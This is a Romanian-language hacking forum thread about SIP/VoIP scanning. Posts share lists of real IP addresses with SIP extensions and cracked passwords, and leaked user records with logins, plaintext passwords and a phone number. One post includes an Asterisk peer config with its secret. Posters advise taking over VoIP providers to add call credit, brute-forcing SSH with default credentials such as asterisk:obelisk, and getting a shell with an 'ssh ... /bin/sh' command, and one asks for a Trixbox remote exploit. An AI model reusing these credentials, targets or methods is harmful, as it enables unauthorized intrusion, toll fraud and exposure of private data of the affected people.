Jump to content
adrianct

SIP VOIP scanner

Recommended Posts

Posted

Nici eu nu am apucat sa ma uit peste el , mai urca o data da nu pe youtube ca nu faci nici o treaba acolo , da vezi nu o arde aiurea cu link`uri nebune sa ne faci exploit draq ne infectezi cu elonore . :))

Posted

| 202.138.138.44 | 9999 | test |

| 202.138.138.44 | 9991 | test |

| 202.138.138.44 | 9995 | test |

| 202.138.138.44 | 9994 | test |

| 202.138.138.44 | 9996 | test |

| 202.138.138.44 | 1035 | test |

| 202.138.138.44 | 1018 | test |

| 202.138.138.44 | 1014 | test |

| 202.138.138.44 | 1015 | test |

| 202.138.138.44 | 1016 | test |

| 202.138.138.44 | 1010 | test |

| 202.138.138.44 | 1011 | test |

| 202.138.138.44 | 1012 | test |

| 202.138.138.44 | 1013 | test |

| 202.138.138.44 | 1032 | test |

| 202.138.138.44 | 1031 | test |

| 202.138.138.44 | 1030 | test |

| 202.138.138.44 | 1024 | test |

| 202.138.138.44 | 1027 | test |

| 202.138.138.44 | 1026 | test |

| 202.138.138.44 | 1021 | test |

| 202.138.138.44 | 1023 | test |

| 202.138.138.44 | 1022 | test |

| 202.138.138.44 | 1036 | test |

| 202.138.138.44 | 1028 | test |

| 202.138.138.44 | 1037 | test |

| 202.138.138.44 | 1034 | test |

| 202.138.138.44 | 1009 | test |

| 202.138.138.44 | 1008 | test |

| 202.138.138.44 | 1007 | test |

| 202.138.138.44 | 1005 | test |

| 202.138.138.44 | 1004 | test |

| 202.138.138.44 | 1002 | test |

| 202.138.138.44 | 1001 | test |

| 202.138.138.44 | 1000 | test |

[PH] Philippines | Nueva Ecija | Quezon

| 217.79.176.175 | 102 | 102 |

[DE] Germany | Nordrhein-Westfalen | Düsseldorf

| 200.42.215.26 | 2002 | 2002 |

| 200.42.215.26 | 2003 | 2003 |

| 200.42.215.26 | 2006 | 2006 |

| 200.42.215.26 | 2004 | 2004 |

[DO] Dominican Republic | Distrito Nacional | Santo Domingo

| 212.174.170.241 | 60 | 1234 |

| 212.174.170.241 | 24 | 1234 |

| 212.174.170.241 | 25 | 1234 |

| 212.174.170.241 | 26 | 1234 |

| 212.174.170.241 | 27 | 1234 |

| 212.174.170.241 | 20 | 1234 |

| 212.174.170.241 | 21 | 1234 |

| 212.174.170.241 | 22 | 1234 |

| 212.174.170.241 | 23 | 1234 |

| 212.174.170.241 | 28 | 1234 |

| 212.174.170.241 | 29 | 1234 |

| 212.174.170.241 | 40 | 1234 |

| 212.174.170.241 | 11 | 1234 |

| 212.174.170.241 | 13 | 1234 |

| 212.174.170.241 | 12 | 1234 |

| 212.174.170.241 | 15 | 1234 |

| 212.174.170.241 | 14 | 1234 |

| 212.174.170.241 | 17 | 1234 |

| 212.174.170.241 | 16 | 1234 |

| 212.174.170.241 | 19 | 1234 |

| 212.174.170.241 | 18 | 1234 |

| 212.174.170.241 | 30 | 1234 |

| 212.174.170.241 | 36 | 1234 |

| 212.174.170.241 | 35 | 1234 |

| 212.174.170.241 | 55 | 1234 |

[TR] Turkey | |

| 201.158.33.148 | 258 | 258 |

| 201.158.33.148 | 252 | 252 |

| 201.158.33.148 | 256 | 256 |

| 201.158.33.148 | 255 | 255 |

| 201.158.33.148 | 202 | 202 |

| 201.158.33.148 | 207 | 207 |

| 201.158.33.148 | 260 | 260 |

[Mexic]

Posted

Nu va mai chinuitzi cu toate prostiile de bruteforcere care le au toti ratatzii,e foarte simplu sa luati direct providerii .. sa va adaugatzi credit .. si sa le setatzi cum vreti.

id: 191

login: wellington

senha: 102423

tipo: 1

regional: ULA

contato:

id: 156

login: eder

senha: 123456

tipo: 1

regional: PRS

contato:

id: 173

login: valdir

senha: 101052

tipo: 1

regional: ULA

contato:

id: 158

login: ranieri

senha: ranierir

tipo: 0

regional: FAC

contato:

id: 159

login: samuelj

senha: 123456

tipo: 0

regional: BHE

contato: 31 84921317

name: 4906

accountcode: 4906

amaflags:

callgroup:

callerid: ENGESET [4906]

canreinvite: yes

jabber:

context: pos-pago

defaultip:

dtmfmode: RFC2833

fromuser:

fromdomain:

fullcontact:

host: dynamic

insecure:

language:

mailbox: 4906

md5secret:

nat: yes

deny:

permit:

mask:

pickupgroup:

port:

qualify: yes

restrictcid:

rtptimeout:

rtpholdtimeout:

secret: 123456

type: friend

username: 4906

disallow: all

allow: g729,gsm,ulaw,alaw

musiconhold:

regseconds: 3600

ipaddr:

regexten:

cancallforward: yes

setvar:

contato:

credito:

tarifado:

lastms:

useragent:

regserver:

defaultuser:

daca tot va place bruteforce-ul .. continuati pe ssh,usere default,console:console,asterisk:obelisk etc .. dupa ce intratzi in interfatza facetzi setarile care le doriti si dup-aia datzi !/bin/sh pt shell,daca nu direct ssh -l user ip '/bin/sh'

Posted (edited)

Dc plm aveti senzatia ca e criptata parola?

Daca nici macar sa o decriptati nu stiti va puteti caca in el de program ca oricum nu stiti sa il folositi.

Scrie clar Base64 in plm.. cand vezi asa ceva + un text fara sens nu te duce capu ca e criptat si sa dai un search pe google?

Edited by twist3r
Posted

daca ai ceva cu exploit, ar fi foarte dragut din partea ta sa-l postezi ... daca ai sipvicious care este vechi de 2 ani de zile, nu prea mai e folositor la nimic ! Numai bine

Apropo, remote exploit pt Trixbox are careva ?

Posted

hi sorry i dont talk your language

adrianct as i se use sip im interested to know

did u got anything new

when i mean new its about new version of IPBx

im work a little with sips and i got windows and root methode

but if u have any new tnx from u :D

Posted

mda , desi eu ma refeream la altceva ex nr suprataxa ... ms de reply oricum a fost o intrebare stupida care se putea raspunde cu un simplu search pe google , care l-am facut dupa postare :) dumb one here

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...